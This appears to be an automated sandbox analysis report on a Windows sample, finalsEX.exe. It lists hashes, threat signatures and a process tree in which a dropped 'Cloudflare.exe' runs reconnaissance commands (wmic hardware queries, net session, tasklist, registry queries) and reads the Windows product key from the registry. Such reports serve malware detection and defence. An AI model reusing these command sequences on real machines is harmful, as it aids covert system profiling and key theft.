Analysis

  • max time kernel
    94s
  • max time network
    162s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-12-2023 14:25

General

  • Target

    finalsEX.exe

  • Size

    70.7MB

  • MD5

    8e1f16bf51614ae0f84cbf4e661672b1

  • SHA1

    e70bed6ac5cdd9e261aa17b065323380be6ecb85

  • SHA256

    f6fb1a472df07503a789882e09d5be36d2460ba8792d3236d55efbf7b598df2b

  • SHA512

    922d31d401247ebc310b473d220ad249d73ddf679b2f2700e8f6f8790b26d757d5abfa8b6132e8ed01d4eb1751614222e46e55b1b4085c4c85acc419e7615180

  • SSDEEP

    1572864:D4/4rzOchP/cSRhct4HaOQVkh8w61pdvQNAt9NlB7:8kqcd32DkGwazD9NlB7

Malware Config

Signatures

  • Irata

    Irata is an Iranian remote access trojan Android malware first seen in August 2022.

  • Irata payload 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 11 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 50 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry key 1 TTPs 37 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 63 IoCs
  • Suspicious use of SendNotifyMessage 61 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\finalsEX.exe
    "C:\Users\Admin\AppData\Local\Temp\finalsEX.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    PID:420
    • C:\Users\Admin\AppData\Local\Temp\2ZOmF7MaREHadFXqvQm1AZM2B6N\Cloudflare.exe
      C:\Users\Admin\AppData\Local\Temp\2ZOmF7MaREHadFXqvQm1AZM2B6N\Cloudflare.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1208
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        3⤵
          PID:4888
          • C:\Windows\system32\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4284
        • C:\Users\Admin\AppData\Local\Temp\2ZOmF7MaREHadFXqvQm1AZM2B6N\Cloudflare.exe
          "C:\Users\Admin\AppData\Local\Temp\2ZOmF7MaREHadFXqvQm1AZM2B6N\Cloudflare.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1960 --field-trial-handle=1748,11712948770378261350,11856974004631909929,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:3080
        • C:\Users\Admin\AppData\Local\Temp\2ZOmF7MaREHadFXqvQm1AZM2B6N\Cloudflare.exe
          "C:\Users\Admin\AppData\Local\Temp\2ZOmF7MaREHadFXqvQm1AZM2B6N\Cloudflare.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=1748,11712948770378261350,11856974004631909929,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2892
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1208 get ExecutablePath"
          3⤵
            PID:5076
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "net session"
            3⤵
              PID:520
              • C:\Windows\system32\net.exe
                net session
                4⤵
                  PID:456
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 session
                    5⤵
                      PID:264
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
                  3⤵
                    PID:4360
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic OS get caption, osarchitecture
                      4⤵
                        PID:1008
                      • C:\Windows\system32\more.com
                        more +1
                        4⤵
                          PID:4620
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"
                        3⤵
                          PID:4500
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
                          3⤵
                            PID:1120
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic csproduct get uuid
                              4⤵
                                PID:4152
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"
                              3⤵
                                PID:1140
                                • C:\Windows\system32\more.com
                                  more +1
                                  4⤵
                                    PID:4632
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic computersystem get totalphysicalmemory
                                    4⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4024
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"
                                  3⤵
                                    PID:408
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic logicaldisk get size
                                      4⤵
                                      • Collects information from the system
                                      PID:3500
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
                                    3⤵
                                      PID:3820
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic cpu get name
                                        4⤵
                                          PID:2712
                                        • C:\Windows\system32\more.com
                                          more +1
                                          4⤵
                                            PID:4240
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
                                          3⤵
                                            PID:2100
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                            3⤵
                                              PID:3996
                                              • C:\Windows\system32\tasklist.exe
                                                tasklist
                                                4⤵
                                                • Enumerates processes with tasklist
                                                PID:6288
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                              3⤵
                                                PID:1132
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                  4⤵
                                                    PID:1500
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                  3⤵
                                                    PID:2352
                                                    • C:\Windows\system32\tasklist.exe
                                                      tasklist
                                                      4⤵
                                                      • Enumerates processes with tasklist
                                                      PID:4620
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                    3⤵
                                                      PID:644
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:5516
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                      3⤵
                                                        PID:4716
                                                        • C:\Windows\system32\tasklist.exe
                                                          tasklist
                                                          4⤵
                                                          • Enumerates processes with tasklist
                                                          PID:5528
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                        3⤵
                                                          PID:1120
                                                          • C:\Windows\system32\tasklist.exe
                                                            tasklist
                                                            4⤵
                                                            • Enumerates processes with tasklist
                                                            PID:5840
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                          3⤵
                                                            PID:4360
                                                            • C:\Windows\system32\tasklist.exe
                                                              tasklist
                                                              4⤵
                                                              • Enumerates processes with tasklist
                                                              PID:5976
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                            3⤵
                                                              PID:2916
                                                              • C:\Windows\system32\tasklist.exe
                                                                tasklist
                                                                4⤵
                                                                • Enumerates processes with tasklist
                                                                PID:6048
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                              3⤵
                                                                PID:1688
                                                                • C:\Windows\system32\tasklist.exe
                                                                  tasklist
                                                                  4⤵
                                                                  • Enumerates processes with tasklist
                                                                  PID:6312
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                3⤵
                                                                  PID:3532
                                                                  • C:\Windows\system32\tasklist.exe
                                                                    tasklist
                                                                    4⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:2424
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                  3⤵
                                                                    PID:3820
                                                                    • C:\Windows\system32\tasklist.exe
                                                                      tasklist
                                                                      4⤵
                                                                      • Enumerates processes with tasklist
                                                                      PID:556
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                    3⤵
                                                                      PID:4048
                                                                      • C:\Windows\system32\tasklist.exe
                                                                        tasklist
                                                                        4⤵
                                                                        • Enumerates processes with tasklist
                                                                        PID:6088
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                      3⤵
                                                                        PID:1572
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist
                                                                          4⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:4108
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          4⤵
                                                                            PID:264
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                          3⤵
                                                                            PID:2712
                                                                            • C:\Windows\system32\tasklist.exe
                                                                              tasklist
                                                                              4⤵
                                                                              • Enumerates processes with tasklist
                                                                              PID:5280
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                            3⤵
                                                                              PID:1492
                                                                              • C:\Windows\system32\tasklist.exe
                                                                                tasklist
                                                                                4⤵
                                                                                • Enumerates processes with tasklist
                                                                                PID:6016
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                              3⤵
                                                                                PID:2004
                                                                                • C:\Windows\system32\tasklist.exe
                                                                                  tasklist
                                                                                  4⤵
                                                                                  • Enumerates processes with tasklist
                                                                                  PID:6140
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                3⤵
                                                                                  PID:1896
                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                    tasklist
                                                                                    4⤵
                                                                                    • Enumerates processes with tasklist
                                                                                    PID:5996
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                  3⤵
                                                                                    PID:3208
                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                      tasklist
                                                                                      4⤵
                                                                                      • Enumerates processes with tasklist
                                                                                      PID:5048
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    3⤵
                                                                                      PID:3944
                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                        tasklist
                                                                                        4⤵
                                                                                        • Enumerates processes with tasklist
                                                                                        PID:6132
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                      3⤵
                                                                                        PID:4140
                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                          tasklist
                                                                                          4⤵
                                                                                          • Enumerates processes with tasklist
                                                                                          PID:6040
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                        3⤵
                                                                                          PID:1300
                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                            tasklist
                                                                                            4⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            PID:6120
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                          3⤵
                                                                                            PID:2100
                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                              tasklist
                                                                                              4⤵
                                                                                              • Enumerates processes with tasklist
                                                                                              PID:6248
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                            3⤵
                                                                                              PID:1768
                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                tasklist
                                                                                                4⤵
                                                                                                • Enumerates processes with tasklist
                                                                                                PID:6104
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                              3⤵
                                                                                                PID:3196
                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                  tasklist
                                                                                                  4⤵
                                                                                                  • Enumerates processes with tasklist
                                                                                                  PID:6008
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                3⤵
                                                                                                  PID:3652
                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                    tasklist
                                                                                                    4⤵
                                                                                                    • Enumerates processes with tasklist
                                                                                                    PID:6224
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                  3⤵
                                                                                                    PID:456
                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                      tasklist
                                                                                                      4⤵
                                                                                                      • Enumerates processes with tasklist
                                                                                                      PID:6216
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                    3⤵
                                                                                                      PID:2448
                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                        tasklist
                                                                                                        4⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        PID:6256
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                      3⤵
                                                                                                      • Modifies registry key
                                                                                                      PID:5080
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                      3⤵
                                                                                                        PID:632
                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                          tasklist
                                                                                                          4⤵
                                                                                                          • Enumerates processes with tasklist
                                                                                                          PID:6328
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                        3⤵
                                                                                                          PID:5088
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                          3⤵
                                                                                                            PID:2188
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                            3⤵
                                                                                                              PID:3640
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                              3⤵
                                                                                                                PID:1392
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                3⤵
                                                                                                                  PID:4508
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                  3⤵
                                                                                                                    PID:2204
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                    3⤵
                                                                                                                      PID:3456
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                      3⤵
                                                                                                                        PID:3996
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                        3⤵
                                                                                                                          PID:3472
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                          3⤵
                                                                                                                            PID:3984
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                            3⤵
                                                                                                                              PID:4328
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                              3⤵
                                                                                                                                PID:4628
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                3⤵
                                                                                                                                  PID:5008
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                  3⤵
                                                                                                                                    PID:4704
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                    3⤵
                                                                                                                                      PID:3896
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                      3⤵
                                                                                                                                        PID:2716
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                        3⤵
                                                                                                                                          PID:4416
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                          3⤵
                                                                                                                                            PID:2584
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                            3⤵
                                                                                                                                              PID:1968
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                              3⤵
                                                                                                                                                PID:696
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                                3⤵
                                                                                                                                                  PID:2684
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4188
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies registry key
                                                                                                                                                    PID:7060
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies registry key
                                                                                                                                                    PID:7652
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies registry key
                                                                                                                                                    PID:7836
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:7888
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies registry key
                                                                                                                                                      PID:7932
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies registry key
                                                                                                                                                      PID:7976
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies registry key
                                                                                                                                                      PID:8020
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies registry key
                                                                                                                                                      PID:8064
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies registry key
                                                                                                                                                      PID:8108
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies registry key
                                                                                                                                                      PID:8152
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies registry key
                                                                                                                                                      PID:1276
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies registry key
                                                                                                                                                      PID:3760
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:7104
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies registry key
                                                                                                                                                        PID:7848
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies registry key
                                                                                                                                                        PID:7844
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:7896
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
                                                                                                                                                          3⤵
                                                                                                                                                          • Modifies registry key
                                                                                                                                                          PID:7988
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:8032
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies registry key
                                                                                                                                                            PID:8076
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies registry key
                                                                                                                                                            PID:8120
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies registry key
                                                                                                                                                            PID:8164
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies registry key
                                                                                                                                                            PID:7252
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4060
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:4832
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:7796
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:7872
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:7908
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:8012
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:7996
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:8028
                                                                                                                                                            • C:\Windows\system32\reg.exe
